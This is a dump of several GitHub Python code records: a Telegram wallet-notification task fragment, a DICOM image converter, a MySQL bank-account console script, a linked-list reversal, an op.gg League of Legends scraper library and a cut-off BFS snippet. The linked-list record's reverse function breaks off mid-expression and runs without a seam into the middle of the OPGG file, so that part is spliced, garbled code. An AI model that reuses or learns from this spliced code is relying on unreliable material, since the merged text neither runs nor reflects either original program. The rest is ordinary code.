\\\n f'TO {render_link(tx.to_address, tx.to_address, chain, \"address\")}\\n'\n text += f'TX FEE: {tx_fee} ({round(tx_fee * Decimal(tx.native_price), 2)}) USD\\n' if tx_fee else ''\n text += f'({render_link(\"View on Explorer\", tx.hash, chain, \"tx\")})'\n return text\n\n\nasync def send_message(chat_id, msg):\n await bot.send_message(chat_id, msg, disable_web_page_preview=True)\n\n\n@app.task\ndef new_transactions_notification():\n loop = asyncio.get_event_loop()\n tx_list = get_new_transactions()\n logging.info(f'new transactions {tx_list}')\n for tx in tx_list:\n for i in range(5):\n try:\n loop.run_until_complete(send_message(tx.wallet.user.id, render_new_tx_text(tx)))\n break\n except ChatNotFound:\n pass\n except RetryAfter:\n logging.error('RetryAfter')\n sleep(5)\n\n\n@app.task\ndef get_tokens_info():\n for chain in WalletChain:\n tokens_info = get_one_inch_tokens(chain[0])\n for key, value in tokens_info['tokens'].items():\n get_or_create_token_contract(key, chain[0], name=value.get('name'), symbol=value.get('symbol'),\n decimals=value.get('decimals'))\n","repo_name":"vkhnychenko/BlockchainScanDjangoNinja","sub_path":"wallets/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"}
{"seq_id":"35786765882","text":"#%% Importando as bibliotecas\n\nimport pydicom as dicom\nimport os\n\n\n#%% Especificando o formato de saida e o diretorio de entrada\n\n# Make it True if you want in PNG format\nPNG = False\n\n# Specify the .dcm folder path\ninput_folder_path = \"Glaucoma/Glaucoma/DICOM-STORAGE/2019/\"\n\n\n#%% Qual metodo de extracao das imagens sera utilizado\n\nmetodo = {1 : \"OpenCV_1\", 2 : \"Matplotlib_1\", 3 : \"PIL_1\", 4 : \"Scipy\"}\n\nn_metodo = 4\n\noutput_folder_path = \"Glaucoma/Glaucoma/Amostragem/\" + metodo[n_metodo] + \"/\"\n\n\n#%% Especificando o diretorio de saida, com base no formato escolhido\n\n# Specify the output jpg/png folder path\nif PNG == True:\n output_folder_path = output_folder_path + 
\"PNG/\"\nelse:\n output_folder_path = output_folder_path + \"JPEG/\"\n \n\n#%% Criando o diretorio de saida das imagens, caso ainda nao exista\n\ntry:\n os.makedirs(os.path.dirname(output_folder_path))\nexcept FileExistsError:\n print(\"O diretorio '{}' ja foi criado.\\n\".format(output_folder_path))\n\n\n#%% Funcao para salvar em um dicionario o caminho (chave) e os arquivos (valores)\n\n# Setando o contador de imagem\ncount_img = 0\n\ndef dir_walker(root_dir):\n dict_dir = {}\n count = 0\n # Iterando entre o diretorio ano (2019)\n for r0, d0, f0 in os.walk(root_dir):\n if len(d0) > 0:\n for d in d0:\n # Iterando entre os diretorios 'meses'\n for r1, d1, f1 in os.walk(os.path.join(r0, d)):\n if len(d1) > 0:\n d1.sort()\n for dd in d1:\n # Iterando entre os diretorios 'dias'\n for r2, d2, f2 in os.walk(os.path.join(r1, dd)):\n if len(d2) == 0:\n f2.sort()\n dict_dir[r2] = f2\n print(r2)\n count += len(f2)\n else:\n f0.sort()\n dict_dir[r0] = f0\n print(r0)\n count += len(f0)\n \n print(\"Count files:\", count)\n return dict_dir, count\n\n\n#%% Aplicando a funcao para o diretorio de entrada\n \n# Pegando um dicionario 'dir_img', sendo:\n # chave = diretorio_imagens\n # valor = lista com os nomes das imagens\n\ndir_img, count_img = dir_walker(input_folder_path)\n\n\n#%% Criando os diretorios de saida\n\nfor k_dir in dir_img.keys():\n \n ano = k_dir.split(\"/\")[-4]\n mes = k_dir.split(\"/\")[-3]\n dia = k_dir.split(\"/\")[-2]\n \n fim_path = ano + \"-\" + mes + \"-\" + dia + \"/\"\n \n dir_fim = os.path.join(output_folder_path, fim_path)\n\n \n # Criando o diretorio do mes\n try:\n os.makedirs(os.path.dirname(dir_fim))\n print(\"Criado o diretorio final de saida:\", fim_path)\n except FileExistsError:\n print(\"O diretorio '{}' ja foi criado.\\n\".format(dir_fim))\n \n\n#%% Extracao Metodo 1 - OpenCV\n\nimport cv2\n\n# -------------------------- METODO 1 ---------------------------------------\nif n_metodo == 1:\n\n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n # print(img_dicom)\n ds = dicom.dcmread(img_dicom)\n pixel_array_numpy = ds.pixel_array\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n cv2.imwrite(img_new, pixel_array_numpy)\n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 2 - Matplotlib\n \nimport matplotlib.pyplot as plt\n\n# -------------------------- METODO 2 ---------------------------------------\nif n_metodo == 2:\n \n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n # print(img_dicom)\n ds = dicom.dcmread(img_dicom)\n pixel_array_numpy = ds.pixel_array\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n # plt.imshow(pixel_array_numpy)\n \n plt.imsave(img_new, pixel_array_numpy)\n \n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 3 - PIL\n\n# import contrib-pydicom\nfrom pydicom_PIL import show_PIL, save_PIL\n\n# import pydicom.contrib.pydicom_PIL.show_PIL 
as show_pil\n\n# -------------------------- METODO 3 ---------------------------------------\nif n_metodo == 3:\n \n for n, k_dir in enumerate(dir_img.keys()):\n print(\"Dir {}: \\t Startting conversion of path {} ...\".format(n, k_dir))\n for v_dir in dir_img[k_dir]:\n \n img_dicom = os.path.join(k_dir, v_dir)\n print(img_dicom)\n ds = dicom.read_file(img_dicom)\n \n # show_PIL(ds)\n \n if PNG == True:\n img_out_name = v_dir.replace('.dcm', '.png')\n else:\n img_out_name = v_dir.replace('.dcm', '.jpg')\n \n img_new = os.path.join(dir_fim, img_out_name)\n # plt.imshow(pixel_array_numpy)\n \n save_PIL(ds, img_new)\n \n # plt.imsave(img_new, pixel_array_numpy)\n \n # print(\"Image converted: \\t\", img_new)\n \n print(\"{} files extract with sucessfully!\\n\".format(k_dir))\n\n\n#%% Extracao Metodo 4: Usando o Scipy\n\nimport matplotlib.pyplot as plt\nimport scipy.misc\n# import pandas as pd\n# import numpy as np\n\n# -------------------- METODO 4 ---------------------------\nif n_metodo == 4:\n images_dicom = dir_img[input_folder_path]\n \n for img_dicom_name in images_dicom:\n input_image = os.path.join(input_folder_path, img_dicom_name)\n \n output_image_jpg = img_dicom_name.replace('.dcm', '.jpg')\n output_image = os.path.join(output_folder_path, output_image_jpg)\n \n ds = dicom.read_file(input_image)\n img = ds.pixel_array\n r = img[0]\n \n plt.imshow(img)\n # scipy.misc.imsave(output_image, img)\n \n print(\"Saving the {} at {} path.\".format(output_image_jpg, output_folder_path))\n \n\n \n ","repo_name":"Mat-Bit/tcc-udesc","sub_path":"scripts/1_image_converter_testes.py","file_name":"1_image_converter_testes.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"74631969115","text":"import mysql.connector\r\nfrom datetime import datetime\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\", user=\"root\", password=\"password\", database=\"student\")\r\n\r\nmycursor = mydb.cursor()\r\n\r\n# mycursor.execute(\"CREATE TABLE bank_account (id INT AUTO_INCREMENT PRIMARY KEY, account_no VARCHAR(255), account_holder VARCHAR(255), balance INT, created_at DATETIME)\")\r\n\r\nclass BankAccount:\r\n def __init__(self, account_no, account_holder):\r\n self.account_no = account_no\r\n self.account_holder = account_holder\r\n self.balance = 0\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n now = datetime.now()\r\n created_at = now.strftime('%Y-%m-%d %H:%M:%S')\r\n sql = \"INSERT INTO bank_account (account_no, account_holder, balance, created_at) VALUES (%s, %s, %s, %s)\"\r\n val = (self.account_no, self.account_holder, self.balance, created_at)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n\r\n def withdraw(self, amount):\r\n if amount > self.balance:\r\n print(\"Insufficient balance\")\r\n else:\r\n self.balance -= amount\r\n now = datetime.now()\r\n created_at = now.strftime('%Y-%m-%d %H:%M:%S')\r\n sql = \"INSERT INTO bank_account (account_no, account_holder, balance, created_at) VALUES (%s, %s, %s, %s)\"\r\n val = (self.account_no, self.account_holder,\r\n self.balance, created_at)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n print(\"Amount Withdrawl Successfully...\")\r\n\r\n def get_balance(self):\r\n return self.balance\r\n\r\n\r\n# account = BankAccount('67549938553', 'Dhananjay Sable')\r\n# account.deposit(1000)\r\n# account.withdraw(500)\r\n# print(\"Account balance:\", account.get_balance())\r\n\r\n\r\nwhile True:\r\n print(\"To Create Account 
press (1)\")\r\n print(\"To Deposit Amount press (2)\")\r\n print(\"To Withdraw Amount press (3)\")\r\n print(\"To Quit press (4)\")\r\n user = int(input(\"Enter Your Option Number : \"))\r\n if user == 1:\r\n acno = int(input(\"Enter Your Account Number : \"))\r\n print(f\"Your Account No is {acno}\")\r\n name = input(\"Enter Your Name : \")\r\n result = BankAccount(acno, name)\r\n print(f\"{name} Your Account is Created Successfully.\")\r\n elif user == 2:\r\n amount=int(input(\"Enter Amount for Deposit : \"))\r\n result.deposit(amount)\r\n print(\"Amount Deposited Successfully..\")\r\n elif user == 3:\r\n amountw=int(input(\"Enter Amount for Withdrawl : \"))\r\n result.withdraw(amountw)\r\n \r\n else:\r\n break\r\n","repo_name":"dhananjay370/python","sub_path":"TryProject.py","file_name":"TryProject.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18677115031","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Linkedlist:\n def __init__(self):\n self.head = None\n \n def append(self, a):\n new_node = Node(a[0])\n if self.head is None:\n self.head = new_node\n\n last = self.head\n for i in range(1, len(a)):\n new_node = Node(a[i])\n\n last.next = new_node\n last = new_node\n \n \n\n def reverse(self,head,k):\n if head==None:\n return None\n prev = None\n next = None\n current = head\n count = 0\n \n while current is not None and count/?&limit=20&hl=en_US&game_type=total\n # https://www.op.gg/_next/data/MU383OsSMb6hg5che0Y88/en_US/multisearch/na.json?summoners=Handofthecouncil%2CTired%2Bmid%2Blaner%2Cabc%2CColbyfaulkn1%2Ccolbyfaulkn%2Cabcd%2Cabcde%2Cabcdef%26region%3Dna®ion=na\n \n \n def __init__(self, summoner_id: str | None = None, region = Region.NA) -> None:\n self._summoner_id = summoner_id\n self._region = region\n self._api_url = f\"https://op.gg/api/v1.0/internal/bypass/summoners/{self.region}/{self.summoner_id}/summary\"\n self._headers = { \n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\" \n }\n self._all_champions = None\n self._all_seasons = None\n\n # ===== SETUP START =====\n logging.root.name = 'OPGG.py'\n\n logging.basicConfig(\n filename=f'./logs/opgg_{datetime.now().strftime(\"%Y-%m-%d\")}.log',\n filemode='a+', \n format='[%(asctime)s][%(name)-22s][%(levelname)-7s] : %(message)s', \n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.INFO\n )\n\n if not os.path.exists('./logs'):\n logging.info(\"Creating logs directory...\")\n os.mkdir('./logs')\n else:\n # remove empty log files\n for file in os.listdir('./logs'):\n if os.stat(f\"./logs/{file}\").st_size == 0 and file != f'opgg_{datetime.now().strftime(\"%Y-%m-%d\")}.log':\n logging.info(f\"Removing empty log file: {file}\")\n os.remove(f\"./logs/{file}\")\n # ===== SETUP END =====\n \n # allow the user to interact with the logger\n self._logger = logging.getLogger(\"OPGG.py\") \n \n # at object creation, setup and query the cache\n self._cacher = Cacher()\n self._cacher.setup()\n \n # check if champions are cached, if they are, populate self.all_champions\n \n \n # check if seasons are cached, if they are, populate self.all_seasons\n \n \n self.logger.info(\n f\"OPGG.__init__(summoner_id={self.summoner_id}, \" \\\n f\"region={self.region}, \" \\\n f\"api_url={self.api_url}, \" \\\n f\"headers={self.headers}, \" \\\n f\"all_champions={self.all_champions}, \" \\\n 
f\"all_seasons={self.all_seasons})\"\n )\n \n \n @property\n def logger(self) -> logging.Logger:\n \"\"\"\n A `Logger` object representing the logger instance.\n \n The logging level is set to `INFO` by default.\n \"\"\"\n return self._logger\n \n @property\n def summoner_id(self) -> str:\n \"\"\"\n A `str` representing the summoner id. (Riot API)\n \"\"\"\n return self._summoner_id\n \n @summoner_id.setter\n def summoner_id(self, value: str) -> None:\n self._summoner_id = value\n self.refresh_api_url()\n \n @property\n def region(self) -> str:\n \"\"\"\n A `str` representing the region to search in.\n \"\"\"\n return self._region\n \n @region.setter\n def region(self, value: str) -> None:\n self._region = value\n self.refresh_api_url()\n \n @property\n def api_url(self) -> str:\n \"\"\"\n A `str` representing the api url to send requests to. (OPGG API)\n \"\"\"\n return self._api_url\n \n @api_url.setter\n def api_url(self, value: str) -> None:\n self._api_url = value\n \n @property\n def headers(self) -> dict:\n \"\"\"\n A `dict` representing the headers to send with the request.\n \"\"\"\n return self._headers\n \n @headers.setter\n def headers(self, value: dict) -> None:\n self._headers = value\n \n @property\n def all_champions(self) -> list[Champion]:\n \"\"\"\n A `list[Champion]` objects representing all champions in the game.\n \"\"\"\n return self._all_champions\n \n @all_champions.setter\n def all_champions(self, value: list[Champion]) -> None:\n self._all_champions = value\n \n @property\n def all_seasons(self) -> list[SeasonInfo]:\n \"\"\"\n A `list[SeasonInfo]` objects representing all seasons in the game.\n \"\"\"\n return self._all_seasons\n \n @all_seasons.setter\n def all_seasons(self, value: list[SeasonInfo]) -> None:\n self._all_seasons = value\n \n @property\n def cacher(self) -> Cacher:\n \"\"\"\n A `Cacher` object representing the summoner_id cacher.\n \"\"\"\n return self._cacher\n \n def refresh_api_url(self) -> None:\n \"\"\"\n A method to refresh the api url with the current summoner id and region.\n \"\"\"\n self.api_url = f\"https://op.gg/api/v1.0/internal/bypass/summoners/{self.region}/{self.summoner_id}/summary\"\n \n self.logger.debug(f\"self.refresh_api_url() called... self.api_url = {self.api_url}\")\n \n \n def get_summoner(self) -> Summoner:\n \"\"\"\n A method to get data from the OPGG API and form a Summoner object.\n \n General flow:\\n\n -> Send request to OPGG API\\n\n -> Parse data from request (jsonify)\\n\n -> Loop through data and form the summoner object.\n \n ### Returns:\n `Summoner`: A Summoner object representing the summoner.\n \"\"\"\n self.logger.info(f\"Sending request to OPGG API... 
(API_URL = {self.api_url}, HEADERS = {self.headers})\")\n req = requests.get(self.api_url, headers=self.headers)\n \n previous_seasons: list[Season] = []\n league_stats: list[LeagueStats] = []\n most_champions: list[ChampionStats] = []\n recent_game_stats: list[Game] = []\n \n if req.status_code == 200:\n self.logger.info(f\"Request to OPGG API was successful, parsing data (Content Length: {len(req.text)})...\")\n content = json.loads(req.text)[\"data\"]\n else:\n req.raise_for_status()\n \n try: \n for season in content[\"summoner\"][\"previous_seasons\"]:\n tmp_season_info = None\n if self.all_seasons:\n for _season in self.all_seasons:\n if _season.id == season[\"season_id\"]:\n tmp_season_info = _season\n break\n \n previous_seasons.append(Season(\n season_id = tmp_season_info,\n tier_info = Tier(\n tier = season[\"tier_info\"][\"tier\"],\n division = season[\"tier_info\"][\"division\"],\n lp = season[\"tier_info\"][\"lp\"],\n tier_image_url = season[\"tier_info\"][\"tier_image_url\"],\n border_image_url = season[\"tier_info\"][\"border_image_url\"]\n ),\n created_at = season[\"created_at\"]\n ))\n \n for league in content[\"summoner\"][\"league_stats\"]:\n league_stats.append(LeagueStats(\n queue_info = QueueInfo(\n id = league[\"queue_info\"][\"id\"],\n queue_translate = league[\"queue_info\"][\"queue_translate\"],\n game_type = league[\"queue_info\"][\"game_type\"]\n ),\n tier_info = Tier(\n tier = league[\"tier_info\"][\"tier\"],\n division = league[\"tier_info\"][\"division\"],\n lp = league[\"tier_info\"][\"lp\"],\n tier_image_url = league[\"tier_info\"][\"tier_image_url\"],\n border_image_url = league[\"tier_info\"][\"border_image_url\"]\n ),\n win = league[\"win\"],\n lose = league[\"lose\"],\n is_hot_streak = league[\"is_hot_streak\"],\n is_fresh_blood = league[\"is_fresh_blood\"],\n is_veteran = league[\"is_veteran\"],\n is_inactive = league[\"is_inactive\"],\n series = league[\"series\"],\n updated_at = league[\"updated_at\"]\n ))\n \n for champion in content[\"summoner\"][\"most_champions\"][\"champion_stats\"]:\n tmp_champ = None\n if self.all_champions:\n for _champion in self.all_champions:\n if _champion.id == champion[\"id\"]:\n tmp_champ = _champion\n break\n \n most_champions.append(ChampionStats(\n champion = tmp_champ,\n play = champion[\"play\"],\n win = champion[\"win\"],\n lose = champion[\"lose\"],\n kill = champion[\"kill\"],\n death = champion[\"death\"],\n assist = champion[\"assist\"],\n gold_earned = champion[\"gold_earned\"],\n minion_kill = champion[\"minion_kill\"],\n turret_kill = champion[\"turret_kill\"],\n neutral_minion_kill = champion[\"neutral_minion_kill\"],\n damage_dealt = champion[\"damage_dealt\"],\n damage_taken = champion[\"damage_taken\"],\n physical_damage_dealt = champion[\"physical_damage_dealt\"],\n magic_damage_dealt = champion[\"magic_damage_dealt\"],\n most_kill = champion[\"most_kill\"],\n max_kill = champion[\"max_kill\"],\n max_death = champion[\"max_death\"],\n double_kill = champion[\"double_kill\"],\n triple_kill = champion[\"triple_kill\"],\n quadra_kill = champion[\"quadra_kill\"],\n penta_kill = champion[\"penta_kill\"],\n game_length_second = champion[\"game_length_second\"]\n ))\n \n for game in content[\"recent_game_stats\"]:\n tmp_champ = None\n if self.all_champions:\n for _champion in self.all_champions:\n if _champion.id == game[\"champion_id\"]:\n tmp_champ = _champion\n break\n \n recent_game_stats.append(Game(\n game_id = game[\"game_id\"],\n champion = tmp_champ,\n kill = game[\"kill\"],\n death = 
game[\"death\"],\n assist = game[\"assist\"],\n position = game[\"position\"],\n is_win = game[\"is_win\"],\n is_remake = game[\"is_remake\"],\n op_score = game[\"op_score\"],\n op_score_rank = game[\"op_score_rank\"],\n is_opscore_max_in_team = game[\"is_opscore_max_in_team\"],\n created_at = game[\"created_at\"]\n ))\n except Exception as e:\n self.logger.warn(f\"Error parsing some summoner data... (Could be that they just come in as nulls): {e}\")\n pass\n \n \n return Summoner(\n id = content[\"summoner\"][\"id\"],\n summoner_id = content[\"summoner\"][\"summoner_id\"],\n acct_id = content[\"summoner\"][\"acct_id\"],\n puuid = content[\"summoner\"][\"puuid\"],\n name = content[\"summoner\"][\"name\"],\n internal_name = content[\"summoner\"][\"internal_name\"],\n profile_image_url = content[\"summoner\"][\"profile_image_url\"],\n level = content[\"summoner\"][\"level\"],\n updated_at = content[\"summoner\"][\"updated_at\"],\n renewable_at = content[\"summoner\"][\"renewable_at\"],\n previous_seasons = previous_seasons,\n league_stats = league_stats,\n most_champions = most_champions,\n recent_game_stats = recent_game_stats\n )\n \n \n def search(self, summoner_names: str | list[str], region = Region.NA) -> list[Summoner]:\n \"\"\"\n Search for a single or multiple summoner(s) on OPGG.\n\n ### Args:\n summoner_names : `str | list[str]`\n Pass either a `str` (comma seperated or single) or `str` list of summoner names.\n \n region : `Region, optional`\n Pass the region you want to search in. Defaults to \"NA\".\n\n ### Returns:\n `list[Summoner]` : A list of summoner objects.\n \"\"\"\n \n if OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n self.logger.info(\"Using cached page props...\")\n else:\n # no comma here would result in bug, no ',' found in str\n if isinstance(summoner_names, str): summoner_names = summoner_names.split(\",\")\n \n # General flow of cache retrieval:\n # 1. Pull from cache db\n # -> If found, add to list of cached summoner ids, and below iterate over and set the summoner id property\n # -> As an extension of the above, these requests would go directly to the api to pull summary/full data\n # -> If not found, add to list of summoner names to query\n # 2. Build the summoner objects accordingly\n cached_summoner_ids = []\n uncached_summoners = []\n \n for summoner_name in summoner_names:\n cached_id = self.cacher.get_summoner_id(summoner_name)\n if cached_id:\n cached_summoner_ids.append(cached_id)\n else:\n uncached_summoners.append(summoner_name)\n \n # pass only uncached summoners to get_page_props()\n # todo: DEBUG, THIS IS GOIGN TO PING OUT EACH TIME FOR NOW\n # page_props = self.get_page_props(uncached_summoners, region)\n page_props = self.get_page_props(summoner_names, region)\n self.logger.debug(page_props)\n \n OPGG.cached_page_props = page_props\n self.logger.info(f\"No cache for {len(uncached_summoners)} summoners: {uncached_summoners}, fetching... (using get_page_props() site scraper)\")\n self.logger.info(f\"Cache found for {len(cached_summoner_ids)} summoners: {cached_summoner_ids}, fetching... 
(using get_summoner() api)\")\n \n # these cross reference the page prop season/champ ids to build out season/champ objects\n # todo: build this into caching system\n self.all_seasons = self.get_all_seasons(self.region, page_props)\n self.all_champions = self.get_all_champions(self.region, page_props)\n \n # TODO: this is just for testing, cache the champs.\n self.cacher.insert_all_champs(self.all_champions)\n \n # todo: if more than 5 summoners are passed, break into 5s and iterate over each set\n # note: this would require calls to the refresh_api_url() method each iteration?\n summoners = []\n for id in page_props['summoners']:\n self.summoner_id = id[\"summoner_id\"]\n summoner = self.get_summoner()\n summoners.append(summoner) \n self.logger.info(f\"Summoner object built for: {summoner.name} ({summoner.summoner_id}), caching...\")\n self.cacher.insert_summoner(summoner.name, summoner.summoner_id)\n \n # cached summoners go straight to api\n # for cached_id in cached_summoner_ids:\n # self.summoner_id = cached_id\n # summoner = self.get_summoner()\n # summoners.append(summoner)\n # self.logger.info(f\"Summoner object built for: {summoner.name} ({summoner.summoner_id})\")\n \n return summoners\n\n\n @staticmethod\n def get_page_props(summoner_names: str | list[str] = \"abc\", region = Region.NA) -> dict:\n \"\"\"\n Get the page props from OPGG. (Contains data such as summoner info, champions, seasons, etc.)\n \n ### Parameters\n summoner_names : `str | list[str], optional`\n Pass a single or comma separated `str` or a list of summoner names.\\n\n Note: Default is \"abc\", as this can be any valid summoner if you just want page props. (All champs, seasons, etc.)\n \n region : `Region, optional`\n Pass the region you want to search in. Default is \"NA\".\n\n ### Returns\n `dict` : Returns a dictionary with the page props.\n \"\"\"\n \n if isinstance(summoner_names, list): summoner_names = \",\".join(summoner_names)\n \n url = f\"https://op.gg/multisearch/{region}?summoners={summoner_names}\"\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\" \n }\n\n req = requests.get(url, headers=headers)\n soup = BeautifulSoup(req.content, \"html.parser\")\n \n return json.loads(soup.select_one(\"#__NEXT_DATA__\").text)['props']['pageProps']\n \n \n @staticmethod\n def get_all_seasons(region = Region.NA, page_props: dict = None) -> list[SeasonInfo]:\n # TODO: SummonerFull might have this info, which would reduce the call out to get_page_props()\n \"\"\"\n Get all seasons from OPGG.\n\n ### Args:\n region : `Region, optional`\n Pass the region you want to search in. 
Defaults to \"NA\".\n \n page_props : `dict, optional`\n Pass the page props if the program has queried them once before.\\n\n Note: Defaults to None, but if you pass them it reduces the overhead of another request out to OPGG.\n\n ### Returns:\n `list[SeasonInfo]` : A list of SeasonInfo objects.\n \"\"\"\n \n # TODO: Revisit this caching logic, pretty sure there's a better way to do this\n if page_props == None and not OPGG.cached_page_props:\n page_props = OPGG.get_page_props(region)\n OPGG.cached_page_props = page_props\n \n elif OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n \n seasons = []\n for season in dict(page_props['seasonsById']).values():\n seasons.append(SeasonInfo(\n id = season[\"id\"],\n value = season[\"value\"],\n display_value = season[\"display_value\"],\n is_preseason = season[\"is_preseason\"]\n ))\n \n return seasons\n\n\n @staticmethod\n def get_season_by(by: By, value: int | str | list) -> SeasonInfo | list[SeasonInfo]:\n \"\"\"\n Get a season by a specific metric.\n \n ### Args:\n by : `By`\n Pass a By enum to specify how you want to get the season(s).\n \n value : `int | str | list`\n Pass the value(s) you want to search by. (id, display_value, etc.)\n \n ### Returns:\n `SeasonInfo | list[SeasonInfo]` : A single or list of SeasonInfo objects.\n \"\"\"\n \n all_seasons = OPGG.get_all_seasons()\n result_set = []\n \n if by == By.ID:\n if isinstance(value, list):\n for season in all_seasons:\n for id in value:\n if season.id == id:\n result_set.append(season)\n else:\n for season in all_seasons:\n if season.id == int(value):\n result_set.append(season)\n \n # TODO: perhaps add more ways to get season objs, like by is_preseason, or display_name, etc. \n \n return result_set if len(result_set) > 1 else result_set[0]\n \n \n @staticmethod\n def get_all_champions(region = Region.NA, page_props: dict = None) -> list[Champion]:\n \"\"\"\n Get all champion info from OPGG.\\n\n Page props method will be deprecated very soon in favour of simply pinging a champion endpoint I found.\n\n ### Args:\n region : `Region, optional`\n Pass the region you want to search in. 
Defaults to \"NA\".\n \n page_props : `dict, optional`\n Pass the page props if the program has queried them once before.\\n\n Note: Defaults to None, but if you pass them it reduces the overhead of another request out to OPGG.\n\n Returns:\n `list[Champion]` : A list of Champion objects.\n \"\"\"\n # TODO: Revisit this caching logic, pretty sure there's a better way to do this\n if page_props == None and not OPGG.cached_page_props:\n # pass any valid username here, it doesnt matter.\n # we just need the page props, and we dont get them without an actual user\n page_props = OPGG.get_page_props(region)\n OPGG.cached_page_props = page_props\n \n elif OPGG.cached_page_props:\n page_props = OPGG.cached_page_props\n \n champions = []\n \n for champion in dict(page_props[\"championsById\"]).values():\n # reset per iteration\n _spells = []\n _skins = []\n \n for skin in champion[\"skins\"]:\n _prices = []\n \n if skin[\"prices\"]:\n for price in skin[\"prices\"]:\n _prices.append(Price(\n currency = price[\"currency\"] if \"RP\" in price[\"currency\"] else \"BE\",\n cost = price[\"cost\"]\n ))\n else:\n _prices = None\n \n _skins.append(Skin(\n id = skin[\"id\"],\n name = skin[\"name\"],\n centered_image = skin[\"centered_image\"],\n skin_video_url = skin[\"skin_video_url\"],\n prices = _prices,\n sales = skin[\"sales\"]\n ))\n \n for spell in champion[\"spells\"]:\n _spells.append(Spell(\n key = spell[\"key\"],\n name = spell[\"name\"],\n description = spell[\"description\"],\n max_rank = spell[\"max_rank\"],\n range_burn = spell[\"range_burn\"],\n cooldown_burn = spell[\"cooldown_burn\"],\n cost_burn = spell[\"cost_burn\"],\n tooltip = spell[\"tooltip\"],\n image_url = spell[\"image_url\"],\n video_url = spell[\"video_url\"]\n )) \n \n champions.append(Champion(\n id = champion[\"id\"],\n key = champion[\"key\"],\n name = champion[\"name\"],\n image_url = champion[\"image_url\"],\n evolve = champion[\"evolve\"],\n passive = Passive(\n name = champion[\"passive\"][\"name\"],\n description = champion[\"passive\"][\"description\"],\n image_url = champion[\"passive\"][\"image_url\"],\n video_url = champion[\"passive\"][\"video_url\"]\n ),\n spells = _spells,\n skins = _skins\n )) \n \n return champions\n \n \n @staticmethod\n def get_champion_by(by: By, value: int | str | list, **kwargs) -> Champion | list[Champion]:\n \"\"\"\n Get a single or list of champions by a specific metric.\n \n ### Args:\n by : `By`\n Pass a By enum to specify how you want to get the champion(s).\n \n value : `int | str | list`\n Pass the value(s) you want to search by. 
(id, key, name, etc.)\n \n **kwargs : `any`\n Pass any additional keyword arguments to narrow down the search.\\n\n Note: Currently only supports \"currency\" for the cost of a champion.\\n\n \n Example: \n `get_champion_by(By.COST, 450, currency=By.BLUE_ESSENCE)`\n \"\"\"\n # Currently kwargs only handles \"currency\" for the cost of a champion,\n # but I might introduce other metrics of getting champ objs later, idk...\n all_champs = OPGG.get_all_champions()\n result_set = []\n \n if by == By.ID:\n if isinstance(value, list):\n for champ in all_champs:\n for id in value:\n if champ.id == id:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.id == int(value):\n result_set.append(champ)\n \n elif by == By.KEY:\n if isinstance(value, list):\n for champ in all_champs:\n for key in value:\n if champ.key == key:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.key == value:\n result_set.append(champ)\n \n elif by == By.NAME:\n if isinstance(value, list):\n for champ in all_champs:\n for name in value:\n if champ.name == name:\n result_set.append(champ)\n else:\n for champ in all_champs:\n if champ.name == value:\n result_set.append(champ)\n \n elif by == By.COST:\n for champ in all_champs:\n if champ.skins[0].prices:\n for price in champ.skins[0].prices:\n if str(kwargs[\"currency\"]).upper() == price.currency and price.cost in value:\n result_set.append(champ)\n \n \n # if the result set is larger than one, return the whole list, otherwise just return the object itself.\n return result_set if len(result_set) > 1 else result_set[0]","repo_name":"ShoobyDoo/OPGG.py","sub_path":"opgg/opgg.py","file_name":"opgg.py","file_ext":"py","file_size_in_byte":27367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"14130947860","text":"# L -> B\r\n\r\n# B: 4,3\r\n# L: 9,6\r\n# R: 6,6\r\n# -> 7\r\n\r\n# B: 2,3\r\n# L: 8,2\r\n# R: 5,2\r\n# -> 6\r\nfrom collections import deque\r\n\r\ndef bfs(grid, start, end, block):\r\n rows, cols = len(grid), len(grid[0])\r\n visited = [[False for _ in range(cols)] for _ in range(rows)]\r\n queue = deque([(start, 0)]) # (position, distance)\r\n visited[start[0]][start[1]] = True\r\n\r\n while queue:\r\n (x, y), dist = queue.popleft()\r\n if (x, y) == end:\r\n return dist - 1 # Subtract 1 because L and B are not counted\r\n\r\n for dx, dy in [(1, 0), (-1, 0), (0, 1), (0, 